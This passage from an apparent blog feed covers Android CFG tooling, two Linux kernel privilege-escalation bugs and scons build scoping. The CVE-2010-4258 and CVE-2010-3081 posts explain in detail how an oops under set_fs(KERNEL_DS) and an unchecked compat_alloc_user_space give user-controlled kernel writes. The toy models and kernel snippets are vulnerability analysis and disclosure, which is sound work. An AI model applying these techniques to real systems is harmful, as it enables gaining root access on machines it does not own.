in the <a href="http://code.google.com/p/k9mail/">k9mail</a> application for Android looks like the following,
when disassembled and rendered to a CFG:</p>

<div id="attachment_442" class="wp-caption aligncenter" style="width: 310px"><a href="http://blog.nelhage.com/wp-content/uploads/2010/12/parseToken.png"><img src="http://blog.nelhage.com/wp-content/uploads/2010/12/parseToken-300x143.png" alt="" title="parseToken" width="300" height="143" class="size-medium wp-image-442" /></a><p class="wp-caption-text">A CFG for k9mail's <tt>ImapResponseParser.parseToken</tt> method</p></div>

<p>I use the term &#8220;parses&#8221; because it&#8217;s really just a pile of regexes, <code>line.split()</code> and <code>line.startswith("...")</code>, but it gets the job done, so I hope it might be of use to someone else. The biggest missing feature is that it doesn&#8217;t parse <code>catch</code> directives, so those just end up floating out to the side as unattached blocks.</p>

<p>You&#8217;ll also notice the rounded &#8220;return&#8221; blocks &#8212; either <code>javac</code> or <code>dx</code> merges all exits from a function to go through the same <code>return</code> block, but I found that preserving that feature in the CFG produces a lot of clutter and makes it hard to read, so I lift every edge that would go to that common block to go to a separate block.</p>
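
<p>To make the &#8220;pile of <code>line.split()</code> and <code>line.startswith()</code>&#8221; approach concrete, here is a rough Python 3 sketch of the general idea. It is not the script from the repository, and the listing format it accepts is a simplified stand-in rather than dedexer&#8217;s real output: one instruction per line, labels written as <code>name:</code>, and the branch target as the last operand. It also skips the <code>return</code>-block lifting described above.</p>

```python
BRANCHES = ("goto", "if-")                # instructions that name a target label
NO_FALLTHROUGH = ("goto", "return", "throw")


def split_blocks(lines):
    """Split a listing into basic blocks: a list of (name, [instructions])."""
    blocks = []
    open_block = False  # True while the last block can take more instructions
    for raw in lines:
        line = raw.strip()
        if not line:
            continue
        if line.endswith(":"):            # a label always starts a new block
            blocks.append((line[:-1], []))
            open_block = True
            continue
        if not open_block:                # code right after a branch
            blocks.append(("block%d" % len(blocks), []))
            open_block = True
        blocks[-1][1].append(line)
        if line.split()[0].startswith(BRANCHES + NO_FALLTHROUGH):
            open_block = False
    return blocks


def find_edges(blocks):
    """Derive CFG edges from the last instruction of each block."""
    edges = []
    for i, (name, insns) in enumerate(blocks):
        last = insns[-1] if insns else ""
        op = last.split()[0] if last else ""
        if op.startswith(BRANCHES):
            edges.append((name, last.split(",")[-1].split()[-1]))
        if not op.startswith(NO_FALLTHROUGH) and i + 1 < len(blocks):
            edges.append((name, blocks[i + 1][0]))
    return edges


def to_dot(blocks, edges):
    """Render blocks and edges as Graphviz dot source."""
    out = ["digraph cfg {", "  node [shape=box];"]
    for name, insns in blocks:
        label = "\\l".join([name + ":"] + insns) + "\\l"
        out.append('  "%s" [label="%s"];' % (name, label))
    for src, dst in edges:
        out.append('  "%s" -> "%s";' % (src, dst))
    out.append("}")
    return "\n".join(out)


sample = """
    const/4 v0,0
l1:
    if-ge v0,v1,l2
    add-int/lit8 v0,v0,1
    goto l1
l2:
    return-void
"""
blocks = split_blocks(sample.splitlines())
edges = find_edges(blocks)
print(to_dot(blocks, edges))
```

<p>Piping the printed text through <code>dot -Tpng</code> gives one box per basic block, with the loop in the sample showing up as a back edge into <code>l1</code>.</p>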

<h2>Github</h2>

<p>Both tools live in my &#8220;reverse-android&#8221; <a href="https://github.com/nelhage/reverse-android">repository</a> on
github, and are released under the MIT license. Please feel free to do
whatever you want with them, although I&#8217;d appreciate it if you let me
know if you make any improvements or find them useful.</p>
]]></content:encoded>
			<wfw:commentRss>http://blog.nelhage.com/2010/12/some-android-reverse-engineering-tools/feed/</wfw:commentRss>
		<slash:comments>4</slash:comments>
		</item>
		<item>
		<title>CVE-2010-4258: Turning denial-of-service into privilege escalation</title>
		<link>http://blog.nelhage.com/2010/12/cve-2010-4258-from-dos-to-privesc/</link>
		<comments>http://blog.nelhage.com/2010/12/cve-2010-4258-from-dos-to-privesc/#comments</comments>
		<pubDate>Fri, 10 Dec 2010 16:02:11 +0000</pubDate>
		<dc:creator>nelhage</dc:creator>
				<category><![CDATA[Computer Security]]></category>
		<category><![CDATA[linux]]></category>
		<category><![CDATA[bugs]]></category>
		<category><![CDATA[cve]]></category>
		<category><![CDATA[full-nelson]]></category>
		<category><![CDATA[kernel]]></category>
		<category><![CDATA[security]]></category>

		<guid isPermaLink="false">http://blog.nelhage.com/?p=418</guid>
		<description><![CDATA[Dan Rosenberg recently released a privilege escalation exploit for Linux, based on three different kernel vulnerabilities I reported recently. This post is about CVE-2010-4258, the most interesting of them, and, as Dan writes, the reason he wrote the exploit in the first place. In it, I&#8217;m going to do a brief tour of the various [...]]]></description>
				<content:encoded><![CDATA[<p>Dan Rosenberg recently <a href="http://thread.gmane.org/gmane.comp.security.full-disclosure/76457">released</a> a privilege escalation exploit
for Linux, based on three different kernel vulnerabilities I reported
recently. This post is about CVE-2010-4258, the most interesting of them, and,
as Dan writes, the reason he wrote the exploit in the first place. In it, I&#8217;m
going to do a brief tour of the various kernel features that collided to make
this bug possible, and explain how they combine to turn an otherwise-boring oops
into privilege escalation.</p>

<h2><code>access_ok</code></h2>

<p>When a user application passes a pointer to the kernel, and the kernel
wants to read or write from that pointer, the kernel needs to perform
various checks that a buggy or malicious userspace app hasn&#8217;t passed
an &#8220;evil&#8221; pointer.</p>

<p>Because the kernel and userspace run in the same address space, the
most important check is simply that the pointer points into the
&#8220;userspace&#8221; part of the address space. User applications are protected
by page table permissions from writing into kernel memory, but the
kernel isn&#8217;t, and so must explicitly check that any pointers given to
it by a user don&#8217;t point into the kernel region.</p>

<p>The address space is laid out such that user applications get the
bottom portion, and the kernel gets the top, so this check is a simple
comparison against that boundary. The kernel function that performs
this check is called <code>access_ok</code>, although there are various other
functions that do the same check, implicitly or otherwise.</p>
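
<p>As a rough illustration, the check can be modeled in a few lines of Python. This is a toy sketch, not kernel code: the <code>TASK_SIZE</code> value is an assumed x86-64-style boundary picked for the example, and the real <code>access_ok</code> is an architecture-specific macro.</p>

<pre><code># Toy model of the user/kernel boundary check; not kernel code.
# TASK_SIZE is an assumed, illustrative split between user and kernel space.
TASK_SIZE = 0x0000_7FFF_FFFF_F000


def access_ok(addr, size):
    """Return True if the byte range starting at addr, size bytes long,
    lies entirely in the user portion of the address space."""
    # range() membership on integers is a constant-time bounds check.
    starts_in_user = addr in range(TASK_SIZE)
    ends_in_user = addr + size in range(TASK_SIZE + 1)
    return starts_in_user and ends_in_user
</code></pre>

<p>With these definitions, <code>access_ok(0x1000, 8)</code> is true, while a pointer near the top of the address space, such as <code>0xffffffff81000000</code>, is rejected.</p>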

<h2><code>get_fs()</code> and <code>set_fs()</code></h2>

<p>Occasionally, however, the kernel finds it useful to change the rules for what
<code>access_ok</code> will allow. <code>set_fs()</code><sup><a href="#fn.1" class="footnote" name="fnr.1">1</a></sup> is an internal Linux function that is used to
override the definition of the user/kernel split, for the current process.</p>

<p>After a <code>set_fs(KERNEL_DS)</code>, no checking is performed that user pointers
point to userspace &#8212; <code>access_ok</code> will always return
true. <code>set_fs(KERNEL_DS)</code> is mainly used to enable the kernel to wrap
functions that expect user pointers, by passing them pointers into the
kernel address space. A typical use reads something like this:</p>

<pre><code>old_fs = get_fs(); set_fs(KERNEL_DS);
vfs_readv(file, kernel_buffer, len, &amp;pos);
set_fs(old_fs);
</code></pre>

<p><code>vfs_readv</code> expects a user-provided pointer, so without the <code>set_fs()</code>, the
<code>access_ok()</code> inside <code>vfs_readv()</code> would fail on our kernel buffer. The
<code>set_fs()</code> call temporarily disables that check.</p>

<h2>Kernel oopses</h2>

<p>When the kernel oopses, perhaps because of a <code>NULL</code> pointer
dereference in kernelspace, or because of a call to the <code>BUG()</code> macro
to indicate an assertion failure, the kernel attempts to clean up, and
then kills the current process by calling the <code>do_exit()</code>
function.</p>

<p>When the kernel does so, it&#8217;s still running in the same process
context it was in before the oops occurred, including any <code>set_fs()</code>
override, if applicable. Which means that <code>do_exit</code> will get called
with <code>access_ok</code> disabled &#8212; not something anyone expected when they
wrote the individual pieces of this system.</p>

<h2><code>clear_child_tid</code></h2>

<p>As it turns out, <code>do_exit</code> contains a write to a user-controlled
address that expects <code>access_ok</code> to be working properly!</p>

<p><code>clear_child_tid</code> is a feature where, on thread exit, the kernel can
be made to write a zero into a specified address in that thread&#8217;s
address space, in order to notify other threads of that exit.</p>

<p>This is implemented by simply storing a pointer to the to-be-zeroed
address inside <code>struct task_struct</code> (which represents a single thread
or process), and, on exit, <code>mm_release</code>, called from <code>do_exit</code>, does:</p>

<pre><code>put_user(0, tsk-&gt;clear_child_tid);
</code></pre>

<p>This is normally safe, because <code>put_user</code> checks that its second
argument falls into the &#8220;userspace&#8221; segment before doing a write. But,
if we are running with <code>get_fs() == KERNEL_DS</code>, it will happily accept
any address at all, even one pointing into kernel space.</p>

<p>So, if we find any kernel <code>BUG()</code> or <code>NULL</code> dereference, or other page
fault, that we can trigger after a <code>set_fs(KERNEL_DS)</code>, we can trick
the kernel into a user-controlled write into kernel memory!</p>
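
<p>The interaction can be sketched as a small Python simulation. The names mirror the kernel&#8217;s, but everything here is a toy model under stated assumptions: the address limits, the dictionary standing in for memory, and the <code>oops_under_kernel_ds</code> helper are all made up for illustration.</p>

<pre><code># Toy simulation of the bug class; not kernel code.
USER_DS = 0x0000_7FFF_FFFF_F000   # assumed user/kernel split
KERNEL_DS = 2 ** 64               # "no limit": every address passes the check
EFAULT = 14

memory = {}                       # sparse fake memory: address to value


class Task:
    def __init__(self, clear_child_tid):
        self.addr_limit = USER_DS
        self.clear_child_tid = clear_child_tid


def put_user(task, value, addr):
    # Checked write: refuse any address at or above the task's current limit.
    if addr not in range(task.addr_limit):
        return -EFAULT
    memory[addr] = value
    return 0


def do_exit(task):
    # Stand-in for mm_release(): zero the registered address on exit.
    put_user(task, 0, task.clear_child_tid)


def oops_under_kernel_ds(task):
    # Hypothetical handler: it raises the limit and then oopses, so the
    # exit path runs before the old limit is ever restored.
    task.addr_limit = KERNEL_DS   # set_fs(KERNEL_DS)
    do_exit(task)                 # the oops path calls do_exit()
</code></pre>

<p>On a normal exit, <code>put_user</code> rejects a <code>clear_child_tid</code> that points into the kernel range and nothing is written. Through <code>oops_under_kernel_ds</code>, the same call zeroes whatever address the thread registered.</p>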

<h2><code>splice()</code> et al.</h2>

<p>An obvious question at this point is: How much of the kernel can an
attacker cause to run with <code>get_fs() == KERNEL_DS</code>?</p>

<p>There are a number of small special cases. For example, the binary
sysctl compatibility code works by calling the normal <code>/proc/</code> write
handlers from kernelspace, under <code>set_fs()</code>. A handful of compat-mode
(32 on 64) syscalls work similarly.</p>

<p>By far the biggest source I&#8217;ve found, however, is the <code>splice()</code>
system call. The <code>splice()</code> system call is a relatively recent
addition to Linux, and allows for zero-copy transfer of pages between
a pipe and another file descriptor.</p>

<p>As of 2.6.31, attempts to <code>splice()</code> to or from an fd that doesn&#8217;t
support special handling to actually do zero-copy <code>splice</code>, will fall
back on doing an ordinary <code>read()</code>, <code>write()</code>, or <code>sendmsg()</code> on the
fd &#8230; from the kernel, using <code>set_fs()</code> in order to pass in kernel
buffers.</p>

<p>What that means is that by using <code>splice()</code>, an attacker can call the
bulk of the code in most obscure filesystems and socket types (which
tend not to have explicit <code>splice()</code> support) with a segment override
in place. Conveniently for an attacker, that is also exactly a
description of where the bulk of the random security bugs tend to be.</p>

<p>This is also exactly the technique Dan&#8217;s exploit uses. He uses
CVE-2010-3849, an otherwise boring <code>NULL</code> pointer dereference I
reported in the Econet network protocol. His exploit code does a
<code>splice()</code> to an econet socket, causing the <code>econet_sendmsg</code> handler to
get called under <code>set_fs(KERNEL_DS)</code>. When it oopses, <code>do_exit</code> is
called, and he gets a user-controlled write into kernel
memory. Everything else is just details.</p>

<p><div id="footnotes">
<h2 class="footnotes">Footnotes: </h2>
<div id="text-footnotes">
<p class="footnote"><sup><a class="footnum" name="fn.1" href="#fnr.1">1</a></sup> Back in Linux 1.x, this function actually set the <tt>%fs</tt> register on i386. It hasn&#8217;t in years, but it&#8217;s used in too many places for changing the name to be worth it.</p>
</div></div></p>


]]></content:encoded>
			<wfw:commentRss>http://blog.nelhage.com/2010/12/cve-2010-4258-from-dos-to-privesc/feed/</wfw:commentRss>
		<slash:comments>2</slash:comments>
		</item>
		<item>
		<title>Some notes on CVE-2010-3081 exploitability</title>
		<link>http://blog.nelhage.com/2010/11/exploiting-cve-2010-3081/</link>
		<comments>http://blog.nelhage.com/2010/11/exploiting-cve-2010-3081/#comments</comments>
		<pubDate>Tue, 30 Nov 2010 16:58:01 +0000</pubDate>
		<dc:creator>nelhage</dc:creator>
				<category><![CDATA[linux]]></category>
		<category><![CDATA[cve-2010-3081]]></category>
		<category><![CDATA[exploits]]></category>
		<category><![CDATA[security]]></category>

		<guid isPermaLink="false">http://blog.nelhage.com/?p=401</guid>
		<description><![CDATA[Most of you reading this blog probably remember CVE-2010-3081. The bug got an awful lot of publicity when it was discovered and announced, due to allowing local privilege escalation against virtually all 64-bit Linux kernels in common use at the time. While investigating CVE-2010-3081, I discovered that several of the commonly-believed facts about the CVE [...]]]></description>
				<content:encoded><![CDATA[<p>Most of you reading this blog probably remember
<a href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2010-3081">CVE-2010-3081</a>. The bug got an awful lot of publicity when it
was discovered and announced, due to allowing local privilege
escalation against virtually all 64-bit Linux kernels in common use at
the time.</p>

<p>While investigating CVE-2010-3081, I discovered that several of the
commonly-believed facts about the CVE were wrong, and it was even more
broadly exploitable than was publicly documented. I&#8217;d like to share
those observations here.</p>

<h2>A brief review of the bug</h2>

<p>The bug arose from the <code>compat_alloc_user_space</code> function in Linux&#8217;s
32-bit compatibility support on 64-bit
systems. <code>compat_alloc_user_space</code> allocates and returns space on the
userspace stack for the kernel to use:</p>

<pre><code>static inline void __user *compat_alloc_user_space(long len)
{
    struct pt_regs *regs = task_pt_regs(current);
    return (void __user *)regs-&gt;sp - len;
}
</code></pre>

<p>This function is only called by compat-mode syscalls, so <code>current</code> is assumed to
be a 32-bit process, in which case <code>regs-&gt;sp</code>, the user stack pointer, will be a
32-bit quantity. Thus, if we subtract a small <code>len</code>, the result should still fit
in 32 bits, which, on a 64-bit system means it is guaranteed to fall within the
user address space.</p>

<p>Because of this, some callers of <code>compat_alloc_user_space</code> were lazy, and did
not call <code>access_ok</code> (or a function which called <code>access_ok</code>) to check that the
result of <code>compat_alloc_user_space</code> fell within the user address space.</p>

<p>However, it turned out that some call sites in the kernel called
<code>compat_alloc_user_space</code> with a user-controlled <code>len</code> value, allowing the
subtraction to wrap around. On a 64-bit system, the kernel lives in the top four
gigabytes of memory, and so this wraparound is enough for a user to cause
<code>compat_alloc_user_space</code> to return a pointer into the kernel&#8217;s address space.</p>
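
<p>The wraparound is easy to check by hand. Here is a small Python model of the pointer arithmetic, reducing modulo 2<sup>64</sup> to mimic a 64-bit register. The stack pointer and length values are made up for illustration and are not taken from any real exploit.</p>

<pre><code># Model of the pointer subtraction in compat_alloc_user_space().
# Python integers do not overflow, so reduce modulo 2**64 to mimic
# 64-bit pointer arithmetic.
def compat_alloc_user_space(sp, length):
    return (sp - length) % 2 ** 64


# Illustrative values only: a 32-bit stack pointer and two lengths.
sp = 0xFFFFD000
small = compat_alloc_user_space(sp, 0x100)       # stays below 4 GB
huge = compat_alloc_user_space(sp, 0xFFFFE000)   # wraps past zero
</code></pre>

<p>Here <code>hex(small)</code> is <code>0xffffcf00</code>, still a 32-bit user address, while <code>hex(huge)</code> is <code>0xfffffffffffff000</code>, which lands in the top four gigabytes.</p>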

<p>Moreover, it turned out that the functions that used a user-controlled <code>len</code>
also did not check <code>access_ok</code> on the result of the allocation. In particular,
Linux 2.6.26 introduced the <code>compat_mc_getsockopt</code> function, which called
<code>compat_alloc_user_space</code> with a user-controlled length and then copied
user-controlled data to this pointer. It is this function which the public
exploit targeted.</p>

<h2>Disabling 32-bit binaries doesn&#8217;t help</h2>

<p>When an <a href="http://www.seclists.org/fulldisclosure/2010/Sep/268">exploit</a> was released for this bug, many sources
circulated a <a href="https://access.redhat.com/kb/docs/DOC-40265">mitigation</a>: Disable 32-bit binaries on a
system. Prevent compat-mode processes from running, the logic goes,
and you prevent anyone from making a compat-mode syscall that triggers
the vulnerable path.</p>

<p>This mitigation indeed prevented the public exploit from working (it
included 32-bit inline assembly, and so couldn&#8217;t even easily be
recompiled as a 64-bit binary), and many observers seemed to believe
it closed the bug entirely.</p>

<p>However, this was not the case! It turns out, on an <code>amd64</code> system, a
64-bit process can still make a compat-mode system call using the <code>int
$0x80</code> instruction, which is the traditional 32-bit syscall mechanism!
Even though the process is running in 64-bit mode, <code>int $0x80</code>
redirects to the compat-mode syscall table.</p>

<p>After realizing this, modifying the public exploit to work when
compiled in 64-bit mode was a simple matter of porting the inline
assembly, and changing a small handful of types. I&#8217;ve posted the
modified <a href="http://nelhage.com/files/abftw_64.c">exploit</a> and the <a href="http://nelhage.com/files/abftw.diff">diff</a> against the original
for the curious.</p>

<h2>The integer overflow is totally irrelevant</h2>

<p>Once you&#8217;ve realized that you can make compat-mode system calls from a 64-bit
process, a little bit of thought reveals something else
interesting. <code>compat_alloc_user_space</code> subtracts the <code>len</code> value off of the
userspace stack pointer. Previously, we relied on subtracting a large value from
a 32-bit stack pointer in order to end up with a kernel pointer. However, while
a 32-bit process is limited to a 32-bit stack pointer, a 64-bit process can write a full
64-bit value into <code>%rsp</code>, and thus <code>regs-&gt;sp</code>! There&#8217;s no need for underflow at
all &#8212; you can just write a 64-bit value into <code>%rsp</code> and do an <code>int $0x80</code>, and
make <code>compat_alloc_user_space</code> return any value you please!</p>
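
<p>In the same toy arithmetic, choosing the stack pointer is just the subtraction run backwards. This sketch assumes a fixed, small allocation size of 40 bytes as a stand-in for <code>sizeof(struct ifreq)</code>; the target address and the <code>rsp_for_target</code> helper are hypothetical.</p>

<pre><code># Toy arithmetic only; nothing here touches real registers.
def compat_alloc_user_space(sp, length):
    # Model of the kernel helper: 64-bit pointer subtraction.
    return (sp - length) % 2 ** 64


def rsp_for_target(target, length):
    # Hypothetical helper: the stack pointer value that makes the
    # allocation come out at exactly `target`.
    return (target + length) % 2 ** 64


ALLOC_SIZE = 40                   # assumed size of the allocation
target = 0xFFFF_FFFF_8100_0000    # made-up address in the kernel range
rsp = rsp_for_target(target, ALLOC_SIZE)
result = compat_alloc_user_space(rsp, ALLOC_SIZE)
</code></pre>

<p>No wraparound is involved: <code>rsp</code> is simply a full 64-bit value, and <code>result</code> equals <code>target</code> even though the length is small and fixed.</p>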

<p>The condition for exploitability thus drops from &#8220;user-controlled
<code>len</code> and no <code>access_ok</code>&#8221; to simply &#8220;no <code>access_ok</code>&#8221;.</p>

<p>This is interesting, because it turns out that some very old kernels, before
2.6.11, including RHEL 4, have the following function:</p>

<pre><code>int siocdevprivate_ioctl(unsigned int fd, unsigned int cmd, unsigned long arg)
{
        struct ifreq __user *u_ifreq64;

        ...
        u_ifreq64 = compat_alloc_user_space(sizeof(*u_ifreq64));

        /* Don't check these user accesses, just let that get trapped
         * in the ioctl handler instead.
         */
        copy_to_user(&amp;u_ifreq64-&gt;ifr_ifrn.ifrn_name[0], &amp;tmp_buf[0], IFNAMSIZ);
        __put_user(data64, &amp;u_ifreq64-&gt;ifr_ifru.ifru_data);

        return sys_ioctl(fd, cmd, (unsigned long) u_ifreq64);
}
</code></pre>

<p>Remember, we can make <code>compat_alloc_user_space</code> return an arbitrary
value. The <code>copy_to_user</code> will call <code>access_ok</code> and fail, but that
return value will be discarded, and the <code>__put_user</code> will scribble 32
bits of user-controlled data at a user-controlled address. Bingo,
local root.</p>
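
<p>The difference between the two calls can be modeled in Python. This is a simulation under stated assumptions, not the kernel&#8217;s implementation: the address limit, the dictionary used as memory, and the 16-byte offset of the data field (the length of the interface name) are choices made for the sketch.</p>

<pre><code># Toy model: a checked copy whose result is ignored, followed by an
# unchecked store. Not kernel code.
USER_LIMIT = 0x0000_7FFF_FFFF_F000   # assumed user/kernel split
IFNAMSIZ = 16

memory = {}                          # sparse fake memory: address to value


def access_ok(addr, size):
    return addr in range(USER_LIMIT) and addr + size in range(USER_LIMIT + 1)


def copy_to_user(dst, data):
    # Checked copy: returns the number of bytes NOT copied.
    if not access_ok(dst, len(data)):
        return len(data)
    for i, byte in enumerate(data):
        memory[dst + i] = byte
    return 0


def put_user_unchecked(value, addr):
    # Stand-in for __put_user(): no access_ok() check at all.
    memory[addr] = value


def siocdevprivate_ioctl(u_ifreq64, name, data64):
    copy_to_user(u_ifreq64, name)                      # failure is discarded
    put_user_unchecked(data64, u_ifreq64 + IFNAMSIZ)   # always writes
</code></pre>

<p>Calling <code>siocdevprivate_ioctl</code> with a pointer above <code>USER_LIMIT</code> leaves the name bytes unwritten, because the checked copy refuses, but the data word is stored anyway.</p>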

<p>It turns out this function was present in Linux 2.4.x, too, meaning
that this exploit even affected RHEL3 and anyone else still running a
2.4-based system!</p>

<p>Based on this observation, I&#8217;ve produced a working proof-of-concept
exploit for RHEL4, based on the released exploit for RHEL5. Contact me
if you&#8217;re interested, but it&#8217;s pretty straightforward.</p>

<h2>Closing notes</h2>

<p>As far as I know, neither of these facts has been publicly
documented prior to this post. I shared this information with Red Hat,
and they requested I keep it private until they released fixes for
RHEL 3, which happened last week. I would not be at all surprised to
learn that someone else has private exploits that incorporate either
or both of these observations, though.</p>

<p>One important moral here is you must be <em>very careful</em> when declaring
a system unaffected by a vulnerability, or declaring a mitigation to
be complete. Software systems have gotten tremendously complex, and
it&#8217;s often impossible to be totally confident you understand every
last way an attacker could tickle a vulnerability.</p>
]]></content:encoded>
			<wfw:commentRss>http://blog.nelhage.com/2010/11/exploiting-cve-2010-3081/feed/</wfw:commentRss>
		<slash:comments>0</slash:comments>
		</item>
		<item>
		<title>Why scons is cool</title>
		<link>http://blog.nelhage.com/2010/11/why-scons-is-cool/</link>
		<comments>http://blog.nelhage.com/2010/11/why-scons-is-cool/#comments</comments>
		<pubDate>Sun, 07 Nov 2010 22:00:38 +0000</pubDate>
		<dc:creator>nelhage</dc:creator>
				<category><![CDATA[Software Engineering]]></category>
		<category><![CDATA[build]]></category>
		<category><![CDATA[C]]></category>
		<category><![CDATA[make]]></category>
		<category><![CDATA[scons]]></category>
		<category><![CDATA[unix]]></category>

		<guid isPermaLink="false">http://blog.nelhage.com/?p=394</guid>
		<description><![CDATA[I&#8217;ve recently started playing with scons a little for some small personal projects. It&#8217;s not perfect, but I&#8217;ve rapidly come to the conclusion that it&#8217;s probably a far better choice than make in many cases. The main exceptions would be cases where you need to integrate into legacy build systems, or if asking or expecting [...]]]></description>
				<content:encoded><![CDATA[<p>I&#8217;ve recently started playing with <code>scons</code> a little for some small
personal projects. It&#8217;s not perfect, but I&#8217;ve rapidly come to the
conclusion that it&#8217;s probably a far better choice than <code>make</code> in many
cases. The main exceptions would be cases where you need to integrate
into legacy build systems, or if asking or expecting developers to
have <code>scons</code> installed is unreasonable for some reason.</p>

<p>The main reason that <code>scons</code> is cool to me, and the thing that makes
it fundamentally different from <code>make</code>, is the introduction of actual
scoping.</p>

<p><code>make</code> has a single global scope. This is one of the main reasons that
people write recursive Makefiles; by giving you one file per
directory, you get one scope per directory, which makes it possible to
have per-directory pattern rules, variables, and all that other stuff,
without driving yourself insane.</p>

<p><code>make</code>&#8217;s awful syntax, confusing varieties of variable,
whitespace-sensitivity, and all the other things that people love to
bitch about are annoying, but to my mind, the single scope that makes
recursive Makefiles the dominant (and, really, the only scalable)
paradigm is the one thing that really sucks.</p>

<p><code>scons</code> solves this by baking various kinds of scoping into the
tool. <code>scons</code> lets you include sub-build-scripts (typically named
<code>SConscript</code>, by convention). Those scripts run in their own namespace
and can establish their own variables, rules, etc., but the end result
is then merged back into the global rule list (handling sub-directory
paths intelligently), so that the scheduler can work globally, instead
of having to recurse.</p>

<p>Furthermore, because of this explicit scoping, you can pass variables,
including targets, between build files, letting you explicitly set up
cross-directory dependencies or share <code>CFLAGS</code> or other variables,
making it easy for different directories to share exactly as much or
as little configuration as you want.</p>

<p>In addition, <code>scons</code> has the concept of &#8220;build environments&#8221;, which
are objects that include build rules, variables, and so on. By
reifying what <code>make</code> just represents as the global environment into
objects, it makes it much easier to scope and program things. For
example, if you have a set of targets that should be built using the
global default rules, except with debugging enabled, you can do:</p>

<pre><code>myenv = env.Clone()
myenv.Append(CFLAGS = ['-g'])
myenv.Program(...)
</code></pre>

<p>By making it (optionally) explicit which sets of rules and variables
are being used in each place, it becomes much easier to share multiple
kinds of targets and rule sets in a single file, without necessitating
lots of sub-files just for scoping, as <code>make</code> tends to require.</p>

<p><code>scons</code> is cool for a bunch of reasons. It eliminates most of the
stupid little annoyances you&#8217;ve probably had with <code>make</code>. But, in my
mind, this is the thing that makes it cool. They&#8217;ve added sane scoping
to the build tool, so that you can construct non-recursive build
systems without going insane.</p>

<p>I&#8217;ll definitely be considering <code>scons</code> for any new projects I write going
forward. I hate <code>make</code>, and this definitely feels like a path forward.</p>
]]></content:encoded>
			<wfw:commentRss>http://blog.nelhage.com/2010/11/why-scons-is-cool/feed/</wfw:commentRss>
		<slash:comments>5</slash:comments>
		</item>
	</channel>
</rss>
